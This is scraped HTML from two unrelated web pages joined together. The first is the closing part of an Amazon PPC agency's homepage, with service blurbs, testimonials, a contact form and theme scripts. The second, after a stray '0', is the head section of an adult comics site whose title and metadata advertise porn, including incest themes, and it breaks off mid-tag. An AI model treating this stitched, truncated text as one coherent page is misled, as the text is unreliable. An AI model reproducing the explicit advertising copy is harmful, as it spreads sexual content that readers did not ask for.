<div class="et_pb_module et_pb_number_counter et_pb_number_counter_3 et_pb_bg_layout_light et_pb_text_align_center et_pb_with_title" data-number-value="101" data-number-separator=""> <div class="percent" ><p><span class="percent-value"></span></p></div> <h3 class="title">Cups of Daily Coffee</h3> </div><!-- .et_pb_number_counter --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_3 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_5"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_3 et_animated et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> Our clients don&#8217;t call us the KINGS OF AMAZON for nothing. </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_4 et_section_regular"> <div class="et_pb_row et_pb_row_6"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_4 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>YOUR SUCCESS IS OUR SUCCESS.</h2> <h2>Less talk. More work. Better PPC.</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_divider et_pb_divider_1 et_animated et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_7 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_5 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>MORE Amazon Sales</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_6 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> Managing your own Amazon PPC ads can get overwhelming, especially if you have multiple listing or storefronts. Our expert team is here to manage all of your sponsored ads, giving you a biweekly report that shows your account&#8217;s progress clearly and simply. </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint et_always_center_on_mobile"> <span class="et_pb_image_wrap"><img src="https://boutiqueseller.com/wp-content/uploads/2018/08/writer-illustration_02.png" alt="" /></span> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_15 et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_5 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_8 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_16 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_17 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_1 et_animated et-waypoint et_always_center_on_mobile"> <span class="et_pb_image_wrap"><img src="https://boutiqueseller.com/wp-content/uploads/2018/08/writer-illustration_01.png" alt="" /></span> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_18 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_7 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>LOWER Monthly ACOS</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_8 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> Running a campaign is the easy part, optimizing it is where we come in. Analyzing and adjusting bids, and finding new keyword opportunities are all part and parcel of what we do to help Amazon sellers succeed. </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_6 et_section_regular"> <div class="et_pb_row et_pb_row_9 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_19 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_9 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2 style="text-align: center;">Amazon A to Z</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_10 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p style="text-align: center;"><span style="font-size: medium;"><span style="font-weight: 400;">Before the majority of our clients started working with us, they were either using another company or managing things themselves. They were unhappy because their accounts weren&#8217;t getting the attention or expertise they deserved. </span></span></p> <p style="text-align: center;"><span style="font-size: medium;"><span style="font-weight: 400;">By working manually on each of our accounts, we have a deep understanding of product lifecycle which allows us to change strategy on a dime. With Boutique Seller, it&#8217;s as if you have an in house expert working with your objective in mind with a personal touch. </span></span></p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_10"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_20 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_21 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_2 et_animated et-waypoint et_always_center_on_mobile"> <span class="et_pb_image_wrap"><img src="https://boutiqueseller.com/wp-content/uploads/2018/08/ask-joel-footer-1.png" alt="" /></span> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_22 et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div id="inventor" class="et_pb_section et_pb_section_7 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_11"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_23 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_11 et_animated et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <span style="font-weight: 400;">Need help selling? Do you have a hit product or do you have an Amazon business on the side? We can manage your Amazon sales from A to Z. Tell us about your product to see how we can help.</span> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_2 et_animated et_pb_bg_layout_light" href="https://docs.google.com/forms/d/e/1FAIpQLScj44-2oDNdmgvIt6Nh55E0BdDR1mlZFhU6J3ONQOFyqou0TA/viewform?usp=send_form" target="_blank">Submit Your Product For Our Consideration</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_8 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_12"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_24 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_12 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>What our clients have to say</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_divider et_pb_divider_2 et_animated et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_13"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_25 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_slider et_pb_slider_0 et_animated et_pb_slider_fullwidth_off"> <div class="et_pb_slides"> <div class="et_pb_slide et_pb_slide_0 et_pb_bg_layout_light et_pb_media_alignment_center et-pb-active-slide"> <div class="et_pb_container clearfix"> <div class="et_pb_slider_container_inner"> <div class="et_pb_slide_description"> <h2 class="et_pb_slide_title">I was working on ads myself, but I just didn't have the time to do it right. Boutique Seller took over and I couldn't be happier. </h2> <div class="et_pb_slide_content"></div> </div> <!-- .et_pb_slide_description --> </div> </div> <!-- .et_pb_container --> </div> <!-- .et_pb_slide --> <div class="et_pb_slide et_pb_slide_1 et_pb_bg_layout_light et_pb_media_alignment_center"> <div class="et_pb_container clearfix"> <div class="et_pb_slider_container_inner"> <div class="et_pb_slide_description"> <h2 class="et_pb_slide_title">Boutiqe Seller is awesome! My ACOS was through the roof before I started and now I'm making good profit on my best selling products. </h2> <div class="et_pb_slide_content"></div> </div> <!-- .et_pb_slide_description --> </div> </div> <!-- .et_pb_container --> </div> <!-- .et_pb_slide --> <div class="et_pb_slide et_pb_slide_2 et_pb_bg_layout_light et_pb_media_alignment_center"> <div class="et_pb_container clearfix"> <div class="et_pb_slider_container_inner"> <div class="et_pb_slide_description"> <h2 class="et_pb_slide_title">The agency we weren't working with wasn't giving us the time of day. David, my Boutique Seller account manager, answered the phone every time we called and he gives our account the attention it needs. </h2> <div class="et_pb_slide_content"></div> </div> <!-- .et_pb_slide_description --> </div> </div> <!-- .et_pb_container --> </div> <!-- .et_pb_slide --> </div> <!-- .et_pb_slides --> </div> <!-- .et_pb_slider --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div id="contact" class="et_pb_section et_pb_section_9 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_14"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_26 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_13 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>TALK TO Joel our CEO</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_divider et_pb_divider_3 et_animated et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_15"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_27 et_pb_css_mix_blend_mode_passthrough"> <div id="et_pb_contact_form_0" class="et_pb_with_border et_pb_module et_pb_contact_form_0 et_animated et_pb_contact_form_container clearfix" data-form_unique_num="0"> <div class="et-pb-contact-message"></div> <div class="et_pb_contact"> <form class="et_pb_contact_form clearfix" method="post" action="https://boutiqueseller.com/"> <p class="et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last" data-id="name" data-type="input"> <label for="et_pb_contact_name_1" class="et_pb_contact_form_label">Name</label> <input type="text" id="et_pb_contact_name_1" class="input" value="" name="et_pb_contact_name_1" data-required_mark="required" data-field_type="input" data-original_id="name" placeholder="Name"> </p><p class="et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last" data-id="phone" data-type="input"> <label for="et_pb_contact_phone_1" class="et_pb_contact_form_label">Phone</label> <input type="text" id="et_pb_contact_phone_1" class="input" value="" name="et_pb_contact_phone_1" data-required_mark="required" data-field_type="input" data-original_id="phone" placeholder="Phone"> </p><p class="et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last" data-id="email" data-type="email"> <label for="et_pb_contact_email_1" class="et_pb_contact_form_label">Email Address</label> <input type="text" id="et_pb_contact_email_1" class="input" value="" name="et_pb_contact_email_1" data-required_mark="required" data-field_type="email" data-original_id="email" placeholder="Email Address"> </p><p class="et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_last" data-id="subject" data-type="select"> <label for="et_pb_contact_subject_1" class="et_pb_contact_form_label">Subject</label> <select id="et_pb_contact_subject_1" class="et_pb_contact_select input" name="et_pb_contact_subject_1" data-required_mark="required" data-field_type="select" data-original_id="subject"> <option value="">Subject</option><option value="PPC">PPC</option><option value="Private Selling">Private Selling</option><option value="CFO Services">CFO Services</option><option value="Consulting">Consulting</option><option value="Refunds">Refunds</option><option value="Photo &amp; Video">Photo & Video</option><option value="Something Else">Something Else</option> </select> </p><p class="et_pb_contact_field et_pb_contact_field_4 et_pb_contact_field_last" data-id="message" data-type="text"> <label for="et_pb_contact_message_1" class="et_pb_contact_form_label">Message</label> <textarea name="et_pb_contact_message_1" id="et_pb_contact_message_1" class="et_pb_contact_message input" data-required_mark="required" data-field_type="text" data-original_id="message" placeholder="Message"></textarea> </p> <input type="hidden" value="et_contact_proccess" name="et_pb_contactform_submit_0"> <input type="text" value="" name="et_pb_contactform_validate_0" class="et_pb_contactform_validate_field" /> <div class="et_contact_bottom_container"> <button type="submit" class="et_pb_contact_submit et_pb_button">Submit Message</button> </div> <input type="hidden" id="_wpnonce-et-pb-contact-form-submitted" name="_wpnonce-et-pb-contact-form-submitted" value="ee89dccf21" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> </div> <!-- .et_pb_contact --> </div> <!-- .et_pb_contact_form_container --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_28 et_pb_css_mix_blend_mode_passthrough et-last-child et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --> </div> </div><span class="et_bloom_bottom_trigger"></span> </div> <!-- .entry-content --> </article> <!-- .et_pb_post --> </div> <!-- #main-content --> <footer id="main-footer"> <div id="footer-bottom"> <div class="container clearfix"> <div id="footer-info">Copyright © 2018 BoutiqueSeller</div> </div> <!-- .container --> </div> </footer> <!-- #main-footer --> </div> <!-- #et-main-area --> </div> <!-- #page-container --> <div class="et_bloom_popup et_bloom_optin et_bloom_resize et_bloom_optin_1 et_bloom_auto_popup et_bloom_trigger_bottom" data-delay="10"> <div class="et_bloom_form_container et_bloom_popup_container et_bloom_form_bottom et_bloom_with_border et_bloom_border_dashed et_bloom_border_position_full et_bloom_rounded et_bloom_form_text_dark et_bloom_animation_fadein"> <div class="et_bloom_form_container_wrapper clearfix"> <div class="et_bloom_header_outer"> <div class="et_bloom_form_header et_bloom_header_text_dark"> <img src="https://boutiqueseller.com/wp-content/plugins/bloom/images/premade-image-15.png" alt="Subscribe To Our Newsletter" class=" et_bloom_image_slideup et_bloom_image"> <div class="et_bloom_form_text"> <h2>Subscribe To Our Newsletter</h2><p>Join our mailing list to receive the latest news and updates from the Boutique Seller team.</p> </div> </div> </div> <div class="et_bloom_form_content et_bloom_1_field et_bloom_bottom_inline"> <form method="post" class="clearfix"> <div class="et_bloom_fields"> <p class="et_bloom_popup_input et_bloom_subscribe_email"> <input placeholder="Email"> </p> <button data-optin_id="optin_1" data-service="mailchimp" data-list_id="a0b7a87c93" data-page_id="-1" data-account="Boutique Seller Services" data-ip_address="true" class="et_bloom_submit_subscription"> <span class="et_bloom_subscribe_loader"></span> <span class="et_bloom_button_text et_bloom_button_text_color_light">SUBSCRIBE!</span> </button> </div> </form> <div class="et_bloom_success_container"> <span class="et_bloom_success_checkmark"></span> </div> <h2 class="et_bloom_success_message">You have Successfully Subscribed!</h2> </div> </div> <span class="et_bloom_close_button"></span> </div> </div> <script type="text/javascript"> var et_animation_data = [{"class":"et_pb_text_0","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"5%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_button_0","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_1","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_divider_0","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_2","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_blurb_0","style":"foldBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_blurb_1","style":"foldBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_blurb_2","style":"foldBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_blurb_3","style":"foldBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_button_1","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_3","style":"flip","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"200%","speed_curve":"ease-in-out"},{"class":"et_pb_text_4","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_divider_1","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_5","style":"slideRight","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_6","style":"slideRight","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_image_0","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_image_1","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_7","style":"slideLeft","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_8","style":"slideLeft","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_9","style":"slideRight","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_text_10","style":"slideRight","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"10%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_image_2","style":"slide","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_11","style":"flip","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"200%","speed_curve":"ease-in-out"},{"class":"et_pb_button_2","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_12","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_divider_2","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_slider_0","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_13","style":"slideTop","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"100%","speed_curve":"ease-in-out"},{"class":"et_pb_divider_3","style":"slide","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_contact_form_0","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"}]; </script> <link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <link rel='stylesheet' id='et_bloom-css-css' href='https://boutiqueseller.com/wp-content/plugins/bloom/css/style.css?ver=1.3.8' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/boutiqueseller.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/boutiqueseller.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/boutiqueseller.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"8b8301adeb","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"c9edc74a33","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","is_builder_plugin_used":"","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"6","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/themes/Divi/js/custom.min.js?ver=3.13.1'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/bloom/core/admin/js/common.js?ver=3.18.5'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/bloom/js/jquery.uniform.min.js?ver=1.3.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var bloomSettings = {"ajaxurl":"https:\/\/boutiqueseller.com\/wp-admin\/admin-ajax.php","pageurl":"https:\/\/boutiqueseller.com\/","stats_nonce":"a4d584302e","subscribe_nonce":"c8a33a96cd","is_user_logged_in":"not_logged"}; /* ]]> */ </script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/bloom/js/custom.js?ver=1.3.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/bloom/js/idle-timer.min.js?ver=1.3.8'></script> </body> </html>
0
<!DOCTYPE html><!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Download Adult Porn Comics - Free 3D-Incest-Hentai Comix</title> <meta name="description" content="Download Sex Porn Comics-Hentai,Incest,Western,3D,Interracial,Milf,XXX Comix Free for Adult. New Cartoon Daily Update!" /> <link rel="canonical" href="http://shentai.xyz/" /> <link rel="next" href="http://shentai.xyz/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Download Adult Porn Comics - Free 3D-Incest-Hentai Comix" /> <meta property="og:description" content="Download Sex Porn Comics-Hentai,Incest,Western,3D,Interracial,Milf,XXX Comix Free for Adult. New Cartoon Daily Update!" /> <meta property="og:url" content="http://shentai.xyz/" /> <meta property="og:site_name" content="Download Adult Porn Comics" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Download Sex Porn Comics-Hentai,Incest,Western,3D,Interracial,Milf,XXX Comix Free for Adult. New Cartoon Daily Update!" /> <meta name="twitter:title" content="Download Adult Porn Comics - Free 3D-Incest-Hentai Comix" /> <meta name="google-site-verification" content="BtcHR2dutVtpkFZqgv4qfJFjHJPl9aMAGVNIs1VHiGs" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://shentai.xyz/#organization","name":"","url":"http://shentai.xyz/","sameAs":[]},{"@type":"WebSite","@id":"http://shentai.xyz/#website","url":"http://shentai.xyz/","name":"Download Adult Porn Comics","publisher":{"@id":"http://shentai.xyz/#organization"},"potentialAction":{"@type":"SearchAction","target":"http://shentai.xyz/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"http://shentai.xyz/#webpage","url":"http://shentai.xyz/","inLanguage":"en-US","name":"Download Adult Porn Comics - Free 3D-Incest-Hentai Comix","isPartOf":{"@id":"http://shentai.xyz/#website"},"about":{"@id":"http://shentai.xyz/#organization"},"description":"Download Sex Porn Comics-Hentai,Incest,Western,3D,Interracial,Milf,XXX Comix Free for Adult. New Cartoon Daily Update!"}]}</script> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Download Adult Porn Comics &raquo; Feed" href="http://shentai.xyz/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/shentai.xyz\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style type="text/css"> .wp-pagenavi{float:left !important; } </style> <link rel='stylesheet' id='xyz_cfm_short_code_style-css' href='http://shentai.xyz/wp-content/plugins/contact-form-manager/css/xyz_cfm_shortcode_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-style-css' href='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-google-fonts-css' href='//fonts.googleapis.com/css?family=Lato%3A400%2C400i%2C700%2C700i&#038;subset=latin' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='http://shentai.xyz/wp-content/themes/graphene/bootstrap/css/bootstrap.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='http://shentai.xyz/wp-content/themes/graphene/fonts/font-awesome/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-css' href='http://shentai.xyz/wp-content/themes/graphene/style.css' type='text/css' media='screen' /> <link rel='stylesheet' id='graphene-responsive-css' href='http://shentai.xyz/wp-content/themes/graphene/responsive.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-style-css' href='http://shentai.xyz/wp-content/plugins/wp-pagenavi-style/css/css3_purple_glossy.css' type='text/css' media='all' /> <script type='text/javascript' src='http://shentai.xyz/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='http://shentai.xyz/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='http://shentai.xyz/wp-content/themes/graphene/bootstrap/js/bootstrap.min.js'></script> <script type='text/javascript' src='http://shentai.xyz/wp-content/themes/graphene/js/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js'></script> <script type='text/javascript' src='http://shentai.xyz/wp-content/themes/graphene/js/bootstrap-submenu/bootstrap-submenu.min.js'></script> <script type='text/javascript' src='http://shentai.xyz/wp-content/themes/graphene/js/html5shiv/html5shiv.min.js'></script> <script type='text/javascript' 